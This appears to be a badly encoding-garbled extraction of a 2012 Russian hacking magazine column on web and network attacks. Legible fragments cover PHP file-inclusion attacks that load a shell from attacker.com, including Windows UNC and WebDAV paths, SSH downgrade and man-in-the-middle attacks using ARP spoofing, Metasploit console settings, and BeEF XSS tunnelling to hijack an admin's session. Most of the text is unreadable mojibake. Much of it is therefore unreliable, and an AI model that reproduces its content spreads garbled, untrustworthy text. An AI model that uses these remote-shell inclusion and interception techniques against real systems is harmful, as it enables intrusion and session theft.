5&;' *+&=+(%$(A @+;$$ +@.'= -<C;ED+=, (+ =+F>+ <"=$('(A, ?(+ D">>"E "("#" -+ =>+C+= *+,+F" >" +*'&">>)/ - *%+:;+= >+=$%$ Slowloris. 2" ' -++@.$ -&*+='>"I(&E %"<>++@%"<>)$ +;D&#H;A>)$ "("#', ('*" SYN-flood’", — '&(+%'E *+-(+%E$(&E >" >+-+= H%+->$. 7+ D"F$ & H?$(+= @+;A:+C+ &,+D&(-" Slowloris ' Slow POST’" +>' D+&("(+?>+ %"<;'?>) & (+?#' <%$>'E "("#HI.$C+ *+($>L'";". N"# ='>'=H= $&;', '&*+;A<HE Slowloris, =+F>+ <"--";'(A - +&>+->+= Apache-*+D+@>)$ -$@-&$%-$%), (+ slow POST’H *+D-$%F$>) *+?(' -&$ +&>+->)$ &$%-$%). O(+ ' (+( F$ Apache, ' -&$ -$%&'' IIS, ' ?(+-(+ ";A($%>"('->+$ -%+D$ lighttpd. 3(+ #"&"$(&E nginx, (+ &'(H"L'E & >'= >$ &+-&$= E&>". 3'&(+ ($+%$('?$&#' +> >$ D+;F$> @)(A *+D-$%F$> ("#+/ "("#$, >+ K"#('?$&#', & H?$(+= ($, ';' '>), >"&(%+$# $C+ &"=+C+ ' PB, >" #+(+%+/ +> #%H('(&E, '>+CD" *+;H?"$(&E $C+ <"-";'(A.

3(+ $.$ «&(%":>+», — #"# ' Slowloris, %$";'<+-"(A "("#H >$ &+&("-;E$( (%HD", '&*+;A<HE ;I@+/ &#%'*(+-)/ E<)#… 7+ '<--%"."(A&E >"= >' # ?$=H, ("# ?(+ +(*%"-;E$=&E <" +K'L'";A>+/ (H;<+/ +( OWASP — goo.gl/lUDmB.

include $GET[‘fi le’];…?>

J"#'= +@%"<+=, $&;' =) *$%$D"D'= ("#+=H &#%'*(H - *"%"=$-(%$ file '=E #"#+C+-(+ $.$ PHP-&#%'*(", (+ PHP *%' $C+ '&*+;->$>'' *+*)("$(&E *+DC%H<'(A &#%'*( '< *"%"=$(%" ' '&*+;>'(A $C+. !+%+:+, >+ >"=, #"# "("#HI.'=, -$DA '>($%$&>+ >$ *%+&(+ ?(+-(+ *+DC%H<'(A '< KH>#L'+>";" -$@-*%';+F$>'E, >"= -$DA >HF$> :$;;. 8 <D$&A H >"& -+<>'#"$( F$;">'$ *+DC%H<'(A &#%'*( & >":'= #+>($>(+=. N"# G(+ &D$;"(A? B*+&+@+- $&(A >$&#+;A#+. N+>$?>+, &"=)/ *%+&(+/ — %"&*+;+F'(A >": PHP-:$;; >" #"#+=-

3"4&*&1&( &$5%"1*/2, -"22,/ (qjv…) 5/%/-"6$#.. 7&1$&%./8 82&4& %"+ = #"'$ 1 -")2/ :)

012131 ".*/")'&'( LFI 0# RFI !#0 #* WINDOWS

!"#$% / EASY HACK

&'()* 09 /164/ 2012054

!"#$%& '(' )'#-*'+)'+' " $,-.-/& 012!34 0$/& %1 5-42- ) )"%':

http://attacker.com/shell.php

61 %-!!34 *01*1# *+-#-/3)-'/ !'7-*/1, /-, ,-, ) ,1!5"8-9 PHP '*/& 10:";, .-0+'(-<(-; 01%8+$.,$ $%-2'!!39 5-421). =-.-21*& #3, )*', .%'*& !-* #12&>' !"7'81 91+1>'81 !' ?%'/ " !-%1 "*,-/& %+$8"', 21,-2&!3' 0$/". @- )'%& .-0+'/3 .-0+'/-A" " /'1+"; /'1-+"'4, - ) ?".!" $ !-* '*/& /101+ ) +$,-)' :).

B11#(', A!' 2"7!1 17'!& "!/'+'*!3 ,+1**/'9!1218"7!3' #-8"-5"7". C# 1%!14 ". !"9 A!' !'%-)!1 +-**,-.-2 D2',*'4 E"!:1) ()1/ )'%&, !- )*' +$," A-*/'+ :)), 7'A A'!; 17'!& 01+-%1)-2. F"7- 1,-.-2-*& %1*/-/17!1 0+1*/14, !1 01.)12;<('4 1#14/" $01A;!$-/34 .-0+'/ !- .-8+$.,$ 5-421) * $%-2'!!39 91*/1).

B*', 7/1 /+'#$'/*; %2; 1#91%- 18+-!"7'!";, — G/1, )1-0'+)39, 7/1#3 )'#-*'+)'+ * PHP #32 .-0$('! 01% Windows, - )1-)/1+39, $,-.-/& 0$/& %1 !->'81 5-42- ) )"%':

\\attacker.com\shell.php

H1 '*/& ,-, #$%/1 %1 )"!%1)14 >-+3. =-, !" */+-!!1, %-!!34 *01-*1# +-#1/-'/. I 0191?', 01/1A$, 7/1 *9'A- 01%,2<7'!"; .%'*& !' $,-.3)-'/*;. 6- )*;,"4 *2$7-4 '(' +-. 1/A'7$, 7/1 %-!!34 *01*1# *+-#1/-'/, /12&,1 '*2" CE — )"!%-, /-, ,-, /12&,1 ) !'4 %'4*/)$'/ %-!!1' «*1,+-('!"'» !- $+1)!' API.

61 " G/1 '(' !' )*'. C7'!& 7-*/1 )'#-*'+)'+3 !-91%;/*; .- 5-4+)12-A", - 01/1A$ 1#+-/"/&*; !-0+;A$< 01 >-+' 7'+'. "!-/'+!'/ , )'#-*'+)'+$ !-A )+;% 2" $%-*/*;. 61 "!/'+'*!1, 7/1 A3

A1?'A $,-.-/& 01+/, 01 ,1/1+1A$ 1! , !-A #$%'/ ,1!!',/"/&*;:

\\attacker.com:31337\shell.php

H-,"A 1#+-.1A, A3 A1?'A 0+1#+$/"/& 01+/3 " !-4/", ,-,14 ". !"9 +-.+'>'!. J%'*& )-?!1 1/A'/"/&, 7/1 '*2" $,-.-! 01+/, 1/2"7-!34 1/ */-!%-+/!181, /1 01%,2<7'!"' $?' #$%'/ 0+1"*91%"/& !' 01 SMB, - 01 WebDAV.

I/-,, A3 "A''A /-,$< 01*2'%1)-/'2&!1*/& %'4*/)"4:1. K1!;/&, 7/1 CE — Windows.2. K1*!"5-/& !- attacker.com /+-5", ", #+$/; 01+/3,

01!;/&, 8%' '*/& «%3+,-».3. K1%!;/& !- %-!!1A 01+/$ -!1!"A!34 WebDAV "2" >-+$.4. B321?"/& !- !'' >'22 " 01%8+$."/& '81.5. L-%1)-/&*;.

LMNM6IM SSH — 1%"! ". 1*!1)!39 0+1/1,121) %2; $%-2'!!181 .-("('!!181 ).-"A1%'4*/)"; ) E'/", ;)2;'/*; 1%!"A ". 82-)!39 -%A"!*,"9 "!/'+5'4*1). I '*2" -/-," !- %+$8"' "!/'+5'4*3 (Web, SSL, RDP) A3 $?' +-.#"+-2" ) Easy Hack, /1 SSH 017'A$-/1 1#1>2" */1+1!14. O/1 ?, "*0+-)2;'A*;.

I/-,, %-)-4 0+'%*/-)"A 0+1*/$< *"/$-:"<: '*/& *'/,-, '*/& -%A"!, '*/& *'+)'+ * 1/,+3/3A SSH, ,1/1+3A -,/")!1 012&.$'/*; -%A"! %2; $%-2'!!181 -%A"!"*/+"+1)-!";. 6-A ?' !'1#91%"A1 012$7"/& %1*/$0 , %-!!1A$ *'+)-,$. I ,-, ?' G/1 *%'2-/&? C/)'/: *'47-* 7-(' )*'81 — !",-, :). 6$, ) *A3*2' !' *1)*'A !",-,, !1 /17!1 !' 7'+'. SSH. J%'*& *2-#1' .)'!1 */1"/ "*,-/& 2"#1 ) %+$8"9 *'+)"*-9 *'+)'+-, 2"#1 ) *-A1A -%A"!'… K+"7"!3 — )3*1,-; .--("('!!1*/& 01*2'%!'4 )'+*"" SSH !- $+1)!' 0+1/1,12- " A-21' ,12"7'*/)1 G,*0214/1) 01% KC… P1/; ;, !-)'+!1', 0'+'8"#-< 0-2,$, 81)1+; «!",-,». B*' ?' 0$/" '*/&.

=1!'7!1, 0'+)1', 7/1 0+"91%"/ !- $A, — bruteforce. H18%- THC Hydra !-A ) +$," " ) #14! 61 )1.A1?!1, G/1 " !' 01/+'#$'/*;, '*2" !-A 01)'.'/. D !->' )'.'!"' )1 A!181A .-)"*"/ 1/ /181, !-*,12&,1 */-+ -/-,$'A34 *'+)'+.

6-> >-!* ) /1A, 7/1 1! #$%'/ 01%%'+?")-/& SSH )'+*"" 1. Q/- )'+*"; 0+1/1,12- SSH "A''/ *'+&'.!$< 0+1#2'A$, ,1/1+-; 01.)1-2;'/ !-A, -/-,$<("A, 0+1)'*/" ,2-**"7'*,$< man-in-the-middle -/-,$ " ) "/18' )"%'/& !'.->"5+1)-!!34 /+-5",.B 1#('A )"%' -/-,- 0+'%*/-)2;'/ *1#14 *2'%$<("4 0+1:'**:1. R3 0+1)1%"A ARP-*0$5"!8 A'?%$ -%A"!1A " *'+)'+1A " /-,"A

1#+-.1A ,1!/+12"+$'A 0'+'%-)-'A34 /+-5",.2. D%A"! ,1!!',/"/*; !- *'+)'+ 01 SSH.3. E'+)'+ 1/0+-)2;'/ *)14 1/,+3/34 ,2<7 ,2"'!/$.4. R3 01%A'!;'A G/1/ ,2<7", !- *)14.5. =2"'!/ SSH -%A"!- )3#"+-'/ >"5+1)-!"', 8'!'+"/ *'**"1!!34

,2<7, >"5+$'/ '81 1/,+3/3A ,2<71A *'+)'+- " 1/0+-)2;'/ '81.

!"#$%&'( #")&* & !+,"#( "' SSH JD@DOD

!"#$"#%$, &%''"#()$*+,)- SSH $"#.)) 1, "," /0%1%

6. H-, ,-, ,2"'!/ .->"5+1)-2 *'**"1!!34 ,2<7 !->"A 1/,+3/3A ,2<71A, /1 A3 '81 +-*>"5+1)3)-'A " 0'+'%-'A %-2&>' *'+)'+$.

7. J->"5+1)-!!1' *1'%"!'!"' !- 1*!1)' *'**"1!!181 ,2<7- $*/-!1)2'!1. 61 A3 .!-'A G/1/ ,2<7, - 01/1A$ A1?'A +-*>"5+1-)3)-/& 0+191%;("4 7'+'. !-* /+-5",.

Q/1/ 0+1:'** " 01,-.-! !- +"*$!,'. F-,/"7'*," %-!!$< -/-,$ A1?!1 +'-2".1)-/& * 01A1(&< Ettercap "2" Cain.

H'0'+& ?' *-A1' )-?!1' — ,-, A!181 1*/-21*& *'+)'+1), ,1/1+3' 01%%'+?")-</ SSH v1? H17!1 ; !' *,-?$, !1 )1 )+'A; 0+1-)'%'!"; 0'!/'*/1) 1!" *"*/'A-/"7'*," 010-%-</*;. E-A- -/-,-

& -".*&/+0' 10#+*&0 !"2),$.&'( 3/,&!' 3 *+4&5 /"*'0*'"5. /+/ 6'" 320#+'(? 3!"3"7"- 03'( *03/"#(/".

!"#$%&#'$ &$#%$() *%+&(), -$.$/

!"#$% 09 /164/ 2012 055

!"#$%& MITM '() SSH *#+,-- 1

./'%(01#2-# % SSH-1.99 - 3/ SSHv1, - 3/ v2

&("0" +1.$'2-$&(3" 4+56 ("# - 2000–2001-7. 8 *+(+76 *+9(' -&$ 3+-)$ &$%-"#' ' :$0$2#' *+&("-0;<(&; 6:$ & *%"-'0=3+/ -$%&'$/ SSH. >+ - (+ :$ -%$7; -&;#+$ *;('0$(3$$ +1+%65+-"3'$ 7+:$( 1)(= 6;2-'7+. ?&+1$33+ @(+ +(3+&'(&; # &$($-+76 +1+%65+-"3'< ' -&$-

-+27+:3)7 3$&("35"%(3)7 :$0$2#"7 (3"*%'7$%, #+3(%+00$%"7), 1$2+*"&3+&(=< #+(+%), *%+'2-+5'($0' *0+,+ 2"3'7"<(&;. A"# *%"#('9$&#'/ *%'7$% — *+&7+(%' 3" shodanhq.com.

>+ ' @(+ $.$ 3$ -&B. >" &"7+7 5$0$ 3$ -&$ ' 3$ &%"26 *$%$C0' 3" SSH v2, 1)0 ' *$%$,+53)/ *$%'+5, #+45" &$%-$%) 50; +1%"(3+/ &+-7$&('7+&(' *+55$%:'-"0' ' *$%-6<, ' -(+%6< -$%&'' SSH. D ("#', &$%-$%+- (+:$ $&(= *69+#, ' ', 7) (+:$ 7+:$7 "("#+-"(=. E5$&= 3"7 *+7+:$( SSH Downgrade "("#".

F(+1) -&$ &%"26 &("0+ ;&3+, &0$56$( &#"2"(= + (+7, #"# &$%-$% *+#"2)-"$(, #"#'$ -$%&'' SSH +3 *+55$%:'-"$(. G&$ +9$3= *%+-&(+. H%' *+5#0<9$3'' *+ SSH &$%-$% +(#%)()7 ($#&(+7 +(-$9"$( #0'$3(6 +53'7 '2 (%$, -'5+- &++1.$3'/:

• SSH-1.5 — *+55$%:'-"$(&; (+0=#+ SSH -$%&'' 1;• SSH-1.99 — *+55$%:'-"<(&; SSH -$%&'' ' 1, ' 2;• SSH-2.0 — (+0=#+ -$%&'; 2.

I+ $&(=, *%+&(+ *+5#0<9'-C'&= # &$%-$%6, 7) 7+:$7 *+3;(=, 3"&#+0=#+ +3 6;2-'7. H%'3J'* %"1+() SSH Downgrade, ; 567"<, ($-*$%= *+3;($3: #+45" #0'$3( #+33$#('(&; # &$%-$%6, 7) *+57$3;$7 +(-$( +( &$%-$%" (+*;(= :$ '&*+0=26; MITM) c ($#&(" «SSH-1.99» 3" «SSH-1.5». A0'$3( 567"$(, 9(+ &$%-$% *+55$%:'-"$( (+0=#+ SSHv1, ' *+5#0<9"$(&;, '&*+0=26; $4+.

A+3$93+, 25$&= $.$ 73+4+$ 2"-'&'( ' +( 3"&(%+$# #0'$3(&#+4+ H?. >+, 3"*%'7$%, (+( :$ 5$-K"#(+ &("35"%(3)/ -'35+-)/ SSH-#0'$3( PuTTY *+55$%:'-"$( SSH -$%&'' ' 2, ' 1 (&7. &#%'3C+().H%"#('9$&#6< %$"0'2"J'< *+#"2)-"(= 3$ 1656, ("# #"# Cain, 3"-*%'7$%, *%+-+5'( @(6 "("#6 3" "-(+7"($ (downgrade + pass sniff = ARP-SSH-1), #+45" '&*+0=26$(&; ARP-&*6K'34. L&0' :$ $&(= :$0"-3'$ &"7+76 *+(%$3'%+-"(=&;, (+ -+( 0'3# — goo.gl/mqgZY.

!"#$%&'$( )&* #+,- METASPLOIT FRAMEWORK CONSOLE E8M8F8

NLOL>DL Metasploit Framework &("0 +53'7 '2 40"-3), *$3($&($%-&#', '3&(%67$3(+-. ?3+ ' *+3;(3+: - 3$4+ *+%('%6$(&; 73+4+ &(+%+33', (602, *"10'# @#&*0+/() *+&(+;33+ 5+1"-0;<(&;, %"&C'%;$(&; K63#J'+3"0 — (+ $&(= *%+$#( *+&(+;33+ %"&($( ' %"2-'-"$(&;.

>$&7+(%; 3" (+ 9(+ 6 MSF $&(= 3$&#+0=#+ -'5+- GUI, +9$3= 73+-4'$ -&$ %"-3+ *+0=26<(&; $4+ #+3&+0=3+/ -$%&'$/ — msfconsole. >$ ("# 5"-3+ ; +13"%6:'0, 9(+ $4+ 7+:3+ 3"&(%+'(= *+5 &$1; ' &5$0"(= '3K+%7"('-3$/.

>"*%'7$%, *%' 2"*6&#$ msfconsole 7) -'5'7 *%'40"C$3'$ «msf>», #+(+%+$ 3$ +9$3=-(+ *+0$23+. >+ +#"2)-"$(&;, -&$ 7+:3+ '27$3'(=. G msfconsole $&(= *"%"7$(%, #+(+%)/ +(-$9"$( 2" (+, 9(+ 165$( +(+1%":"(=&;. D '7; $76 — PROMPT. P&("3+-#" 23"9$3'; *$%$7$33+/ +&6.$&(-0;$(&; &("35"%(3)7' #+7"35"-7': «set» — 3"&(%+/#" 165$( *%'7$3$3" - %"7#", 5"33+/ &$&&'', «setg» — 3"&(%+/#" «3"-&$45"», (+ $&(= &+,%"3'(&; - *+0=2+-"-($0=&#+7 #+3K'4$.

>"*%'7$%, &0$56<.$/ #+7"35+/ 7) 6#"2)-"$7 -)-+5'(= IP-"5%$& - 3"9"0$ #":5+/ #+7"35) (9(+ +9$3= 65+13+, ("# #"# &%"26 *+3;(3+, 9(+ -)-+5'(= - LHOST 50; 7+560$/):

set PROMPT %L

G '(+4$ 7) *+069'7 *%'7$%3+ &0$56<.$$:

192.168.0.1>

A%+7$ %L, #+(+%"; +(-$(&(-$33" 2" -)-+5 0+#"0=3+4+ IP-"5%$&" 7"C'3), $&(= $.$ ' 5%64'$. M"0$$ *+03)/ &*'&+#:

%D — *6(= 0+#"0=3+/ 5'%$#(+%''; %H — hostname "("#6<.$4+;%J — #+0'9$&(-+ 2"*6.$33), 7+560$/ (job);%L — IP-"5%$& "("#6<.$4+;%S — #+0'9$&(-+ '7$<.',&; &$&&'/;%T — timestamp;%U — '7; *+0=2+-"($0;, 2"*6&('-C$4+ msf.

A%+7$ (+4+, $&(= $.$ 5+*+03'($0=3)$ K'9'. G+-*$%-),, 50; %T 7+:3+ 6#"2)-"(= K+%7"( -%$7$33), 7$(+#, '&*+0=26; $.$ +536 *$%$7$336< — PromptTimeFormat, & 6#"2"3'$7 *"%"7$(%+- (%d — 5$3=, %m — 7$&;J, %y — 4+5 ' ("# 5"0$$). G+--(+%),, 50; 65+1&(-" '7$$(&; -+27+:3+&(= '&*+0=2+-"(= J-$(" — ', 5+&("(+93+ 73+4+, ' '7$36<(&; +3' *+ *$%-)7 (%$7 16#-"7 3"2-"3'; 3" "340'/&#+7: %yel — :$0()/, %red — #%"&3)/ ' ("# 5"0$$. >6 ' #%+7$ (+4+, -&$, 9(+ 3"9'3"$(&; 3$ & %, 165$( +(+1%":"(=&; #"# ($#&(.

I"#'7 +1%"2+7, 73$ #":$(&;, 65+13"; #+3&+0= 165$( '7$(= 3"-&(%+/#6 (("#:$ &7. &#%'3C+():

set PROMPT %L %redS:%S J:%J

4/%&(5267 IP, %/(-1#,8*/ ,#,,-7 - jobs’/*

!"#$% / EASY HACK

&'()* 09 /164/ 2012056

!"#$%&'!($)* )+%%,-* .,",' XSS !"#"$"

% &'()* +(,-*.)(/0 1 2',3 )3 4,5) /)*04' (%1%3,*0316,%/1 %37613%&). "30/7891- 6,(,: 143,(+,-% *)2,3 7/0:03; ',-%3.1, '<& /0/)5)-41=7'; 1: =(07:,(). 2,(3., .>?)<413; %/041().041, ?)(3). 40?(1*,(. @'(), ?)<761. )3 030/789,5) /)*04'7, ?,(,-?(0.13 / 2,(3., ,9, ')?)<413,<;4>- /7%)/ JS, /)3)(>- 1%?)<413 7/0:04478 /)*04'7 (3) ,%3; %/041().041, ?)(3).), 0 (,:7<;303 )3?(0.13%& )=(034) . &'(). A()*, %/041().041& ?)(3)., *)24) . <8=)- *)*,43 ?)'5(7:13; /0/)--41=7'; B/%?<)-3, 40?(1*,(, 1 :0C.0313; /)43()<; 40' 306/)-. D0 %0*)* ',<, B3) )6,4; *)940& E37/0. F)<760,3%&, 63) <8'1 /0/ => %0'&3%& 40 /(86)/…

D) .,(4,*%& / 3744,<8. G'41* 1: 030/7891C *)'7<,- BeEF’0 &.<&,3%& Tunnel Proxy (aka XSS-3744,<;).

#<& 3)5) 63)=> %',<03; XSS-3744,<;, 40* ?)3(,=7,3%& ?()?1%03; . 40E,* =(07:,(, %?,H10<;4>- ?()/%1-%,(.,( )3 BeEF’0 (?) 7*)<-60418 127.0.0.1, ?)(3 6789). F)%<, B3)5) .%, /<1/1 . 40E,* =(07:,(, (3) ,%3; HTTP-:0?()%>) =7'73 )=(0=03>.03;%& B31* ?()/%1. #044>- ?()/%1, ?)<760& :0?()% )3 030/789,5), *)'1+1H1(7,3 ,5) %?,H1-0<;4>* )=(0:)* 1 ?,(,?(0.<&,3 JS *)'7<8 BeEF’0 . =(07:,(, 2,(3.>. I3)3 *)'7<; .>?)<4&,3 :0?()% 40 030/7,*>- %,(.,(, 4) )3 1*,41 :0XSS’,44)- 2,(3.>. J,:7<;303> :0?()%0 (HTML-%3(0416/0) ?)<76083%& B31* JS-*)'7<,* BeEF’0 1 ?,(,?(0.<&83%& )=(034) . &'() BeEF’0. G337'0 '044>, /)4.,(31(783%& 1 ?,(,'083%& 40 BeEF-?()/%1, /)3)(>-, . %.)8 )6,(,';, )3)=(020,3 %3(041H7 '<& =(07:,(0 030/789,5). K) ,%3; +0/316,%/1 030/7891- .1'13 3), 63) «.1'13» 2,(3.0. #0<,, 030/7891- *)2,3 .>?)<413; ,9, /0/),-3) ',-%3.1,, 40?(1*,( ..,%31 /0/78-41=7'; +)(*7 1 )3?(0.13; ,,. L%, B30 )?,(0H1& ?).3)(13%&, JS BeEF’0 )3?(0.13 )3 1*,41 2,(3.> '044>- :0?()%, 1 (,:7<;303> ,5) ?)?0'73 )=(034) 030/789,*7.

#7*08, 63) 3,?,(; .%, %30<) ')%303)64) ?)4&34). A0/ .1'1E;, B3) +0/316,%/1 7'0<,44), 7?(0.<,41,. K,?,(; ) ?<8%0C, *147%0C 1 3)4/)%3&C. L024) ?)*413; ) 3)*, 63) )3?(0.<&,*>, JS-*)'7<,* BeEF’0 :0?()%> )3 =(07:,(0 2,(3.> 40 030/7,*>- .,=-%,(.,( (0'-*14/7) =7'73 %)',(203; 073,431+1/0H1)44>, /7/1 . :05)<)./0C, 3) ,%3; 030/7891- =7',3 1*,3; 040<)5164>- ')%37? . 0'*14/,, 63) 1 2,(3.0. L)-.3)(>C, =)<;E1* ?<8%)* :',%; &.<&,3%& 3), 63) 2,(3.0 4, :40,3 ) ',-%3.1&C, /)3)(>, ?()1:.)'13 030/7891- )3 ,, 1*,41. I3) .):*)24) ?)3)*7, 63) *> *)2,*, 40?(1*,(, :0*0413; 2,(3.7 / 40* 40 %0-3, 0 40 4,* . %/(>3)* +(,-*, )3/(>3; %0-3-0'*14/7 1 6,(,: XSS’/7 . 4,* ?)'5(7:13; JS )3 BeEF’0. M ?)/0 2,(3.0 =7',3 40 40E,* %0-3,, *> *)2,* ?()1:.)'13; 40E7 030/7.

"30/0 %304).13%& ,9, =)<,, )?0%4)-, /)5'0 *> 40C)'1*-%& . )'4)* %,5*,43, % 0'*14)* (2,(3.)-) 1 *)2,* ?().)'13; MITM-030/7 (arp-spoofing, 40?(1*,(). L '044)* %<760, *> *)2,* .%30.<&3; 30/)- %/(>3>- +(,-* .) .%, )3/(>.0,*>, 0'*14)* .,=-%3(041H> (/)3)(>, ?,(,'083%& ?) HTTP) 1 ?)'',(21.03; 030/7 30/1* )=(0:)* ') ?)=,'4)5) /)4H0.

M: *147%). 1 3)4/)%3,- %3)13 )3*,313;, .)-?,(.>C, 3), 63), . )3-<161, )3 *4)51C '(751C *)'7<,- BeEF’0, ?(1 Tunnel Proxy JS BeEF’0 ')<2,4 =>3; ?)'5(72,4 1*,44) 6,(,: XSS 40 030/7,*)* %0-3,. I3) .024) '<& 3)5), 63)=> 4, 40(7E03; /()%%')*,44>, ?)<131/1 (SOP) 1 1*,3; .):*)24)%3; .>?)<4&3; 073,431+1/0H1)44>, :0?()%> 1 ?)<7603; 40 41C )3.,3>. " .)-.3)(>C, 30/ /0/ 7 40% ,%3; ?,(,-'089,, :.,4) (JS-*)'7<; BeEF’0) 1 *> (0=)30,* 4, 40?(&*78 % %,(.,()*, 3) *)573 .):41/473; 3(7'4)%31 ?(0/316,%/)5) ?<040 — % )3)=(02,41,* /)43,430 1<1 4, )6,4; /)((,/34)- (0=)3)- % :0?()-%0*1, /)5'0 1%?)<;:783%& /0/1,-3) %3(044>, 3,C4)<)511 :).

G?&3; 2,, % 3)6/1 :(,41& %).%,* ?(0/316,%/)-, :',%; )%)=) (0%%/0:>.03; 4,6,5): 3(,=7,3%& .>=(03; 2,(3.7, 7/0:03; *)'7<; TunnelProxy 1 40%3()13; %.)- =(07:,( 40 ?()/%1 BeEF’0. !',%; <76E, .%, %.)1*1 5<0:0*1 7.1',3; (goo.gl/SdHB8), 0 ,9, <76E, — ?)?()=).03; %.)1*1 (76/0*1.

L)3 1 .%,, 40',8%; =><) 143,(,%4). N%?,E4>C (,%,(6,. 1 ?)-:4041- 4).)5)! z

JOPODMO M30/, )?&3; ?(,'%30.1* %,=, %1370H18. O%3; %,(.,( % 0'*141-%3(031.4>* .,=-143,(+,-%)*, ,%3; 0'*14 1 ,%3; *>, 0 C)31* *> ?)).413; '044>- %,(.06)/. F(,'?)<)21*, 63) /0/1C-3) %.,(C/(1-3164>C 7&:.1*)%3,- 40 .,=, 40-',4) 4, =><), 0 3)<;/), %/02,*, XSS’/0. M .()', => .%, )3<164): C.030- XSS’/)- /7/1, 1 .?,(,'! D) /0/ => 4, 30/. A0/ *141*7*, ?()=<,*)- *)2,3 %303; 7%304).<,4-4>- %,(.,()* '<& /7/1%). +<05 HTTPOnly, /)3)(>- 4, '0%3 40* .):*)24)%3; .>473; 1C 1: =(07:,(0 0'*140. #(75)- ?()=<,*)- *)2,3 %303; +1<;3(0H1& ?) IP ')%37?0 / .,=-%,(.,(7 1<1 / %0*)- 0'*14/,. M 63) 2, 3)5'0 ',<03;? G(5041:).03; 3744,<; 6,(,: XSS. $3) => 30* 41 5).)(1<)%; ) ?()'.1473)* 1%?)<;:).0411 XSS’)/, 4) %0*>* *)94>* payload’)*, & '7*08, &.<&,3%& /0/ (0: XSS-3744,<;. !06,* 40* 073,431+1/0H1)44>, /7/1, /)5'0 *> *)2,* 40?(&*78 .>?)<4&3; /0/1,-3) ',-%3.1& 40 %0-3, )3 1*,41 40E,- 2,(3.>?

D) ?)%3)-. #0.0- ?)%*)3(1*, 63) 2, 30/), XSS-3744,<145. O%<1 5).)(13; . )=9,*, 3) B3) %?,H10<;4>- JavaScript, /)3)(>- ?)'5(720-,3%& XSS’/)- 40E,- 2,(3.,. #0<,, B3)3 JS )3/(>.0,3 /0/78-41=7'; %3(041H7 40 030/7,*)* %0-3, 1 ?)<4)%3;8 ,, 40* ?,(,%><0,3. Q> .1-'1* ,, . %.),* =(07:,(,, /<1/0,*, /7'0 4724), 4) 40E1 ',-%3.1& 4, .>?)<4&83%& =(07:,()*, 0 ?,(,'083%& )=(034) . B3)3 JS, /)3)(>- 1 ?()1:.,',3 4,)=C)'1*>, ',-%3.1& 40 030/7,*)* %0-3,, 4) )3 1*,41 2,(3.>. F(16,* 2,(3.0 )= B3)* 4, =7',3 ')50'>.03;%&.

G?1%041,, /)4,64), )6,4; )=9,,, '<& ?)41*041& 1',1. D0 ?(0/-31/, .%, ?()1%C)'13 4,%/)<;/) %<)24,,, /)<16,%3.) B<,*,43). 4,%/)<;/) =)<;E,, 1 B3) *> %,-60% (0%%*)3(1* 40 ?(1*,(, BeEF.

BeEF — B3) %?,H10<;4>- +(,-*.)(/ '<& ?().,',41& *)94>C 1 5<7=)/1C 030/ 40 =(07:,(> % 1%?)<;:).041,* XSS’)/. D0 %0*)* ',<,, *)2,3 =>3;, 4, )6,4; C)()E) ?)<760,3%&, 63) )?1%>.03; 30/78 ?(,/(0%478 .,9;, /0/ BeEF, *4, ?(1C)'13%& . 4,%/)<;/) %3()/, .,'; )40 :0%<721.0,3 )3',<;4)- %303;1. D) & '7*08, 63) . %<,'7891C .>?7%/0C *> B3) ?)?(0.1*.

M30/, BeEF ?(,'%30.<&,3 %)=)- 3(,C/)*?)4,43478 %1%3,*7:1. R(07:,(> 2,(3. — hoocked browsers. R(07:,(>, . /)3)(>, 40*

7'0<)%; ?)'5(7:13; %.)-, 0 3)64,, BeEF’0, JavaScript-/)'.2. @'() BeEF’0 — 5<0.4), %.&:789,, 1 .%,)=(0=03>.089,, :.,4).3. M43,(+,-% BeEF’0, / /)3)()*7 030/7891- ?)'/<860,3%&, 1%-

?)<;:7& %.)- =(07:,(, 1 6,(,: /)3)(>- )4 *)2,3 «7?(0.<&3;» 2,(3.0*1. D0 %0*)* ',<, 4, %).%,* 7?(0.<&3;, 0 %/)(,, :0?7-%/03; 3, 1<1 14>, 030/7891, *)'7<1.

O%<1 ?)%*)3(,3; 40 B3) . ?()H,%%,, 3) 030/7891- % ?)*)9;8 XSS’)/ 1<1 ?()%3) :0*041. 2,(3.7 %,=, 40 %0-3, ?)'5(720,3 ,- . =(07:,( JS BeEF’0. #044>- JS «7%3040.<1.0,3 %),'14,41,»

!"#" $ %&'()$*)$+%', ("&$-.,

!"#$% 09 /164/ 2012 057

&'()* Sanjar Satsura (satsura@1337day.com, twitter.com/sanjar_satsura)

!"#$% 09 /164/ 2012 057

/"0'01223+ ("&$-4 — 5)$ 21 (&$*)$ 6-'223+ 2"7$& 78%9, :';& ' *'<9$-$9 9 &"=23, &1#'*)&",. >)$73 &1%9'=')3 ($-4=$9")1-1+ 8*)$.-' (1&16 7"2"-423< 7&8);$&*$<, &"=&"7$)?'%"< 28@2$ (&$68<")4 *7"-"2*'&$9"228A ' 5;;1%)'928A *'*)1<8 B';&$9"2'.. C$-4B$+ %$<("2'', ?)$73 ($2.)4 5)$, 21$7,$6'<$ *)$-%28)4*. * 8)1?%$+ 6"223,, " )171 6$*)")$?2$ (&$*)$ (&$?')")4 *)")4A!

+,-, ! "#$%&!'&!("$) %*#!+,)!"#$%& '( "!)#* +,#-.(* # /(0#0(1$ 2(3+4# +5 -3!56+3%(

INTRO D$*-16211 9&1<. 2$9$*)2". -12)" (1*)&') ($*)"<' $7 8)1?%", ("&$-1+ * %&8(23, &1*8&*$9. E*-' )3 *-16'B4 =" 2$9$*).<' <'&" FC, )$ 2"91&2.%" *-3B"- $7 8)1?%1 6,46 <'--'$2" ,1B1+ ("&$-1+ %&8(21+B1+ *$:'"-42$+ *1)' 6-. (&$;1**'$2"-$9 — LinkedIn (www.linkedin.com). D$ *1+ 6124 5)$) '2:'612) &"**-168A) *"<31 %&8)31 *(1:3 GCH. I$@2$ *%"=")4, ?)$ ($*-162'1 ($-#$6" $&#"-2'=":'. 8)1?1% ("&$-1+ .9-.1)*. 21#-"*23< )&126$< 9 %&8#", "2$2'<8*$9.

/" 5)$ 9&1<. 73-' $(87-'%$9"23 ,1B' )"%', ($(8-.&23, &1*8&*$9, %"% Last.fm, Yahoo Voice, eHarmony, NVIDIA. J171=3=-91*)2". %$<("2'. Rapid 7 (&$91-" "2"-'= 165 )3*.? ,1B1+, *-')3, * LinkedIn, ' *$*)"9'-" '2;$#&";'%8 *"<3, ($(8-.&23, ($2" (&'--$@12" 9 %"?1*)91 '--A*)&":'' % 5)$+ *)")41).

